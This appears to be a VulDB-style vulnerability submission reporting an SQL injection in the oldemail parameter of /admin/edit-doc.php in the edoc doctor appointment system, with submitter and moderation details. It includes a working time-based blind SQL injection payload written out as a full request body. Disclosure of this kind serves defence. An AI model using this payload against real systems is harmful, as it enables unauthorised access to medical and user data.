Title | Sql injection exists for oldmail parameter of edoc doctor appointment system |
---|
Description | SQL injection vulnerability exists in oldmail parameter of /admin/edit-doc.php file of edoc doctor appointment system
Important user data or system data may be leaked and system security may be compromised.The environment is secure and the information can be used by malicious users.
Payload:id00=1&oldemail=doctor@edoc.com' RLIKE SLEEP(5)-- ZZpV&email=123@123com&name=123&nic=123&Tele=123123123123&spec=1&password=123123&cpassword=123123 |
---|
Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20doctor%20appointment%20system%20vlun4.pdf |
---|
User | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
---|
Submission | 02/27/2023 08:23 AM (2 years ago) |
---|
Moderation | 02/27/2023 12:08 PM (4 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 221825 [SourceCodester Doctors Appointment System 1.0 /admin/edit-doc.php email/oldmail sql injection] |
---|
Points | 20 |
---|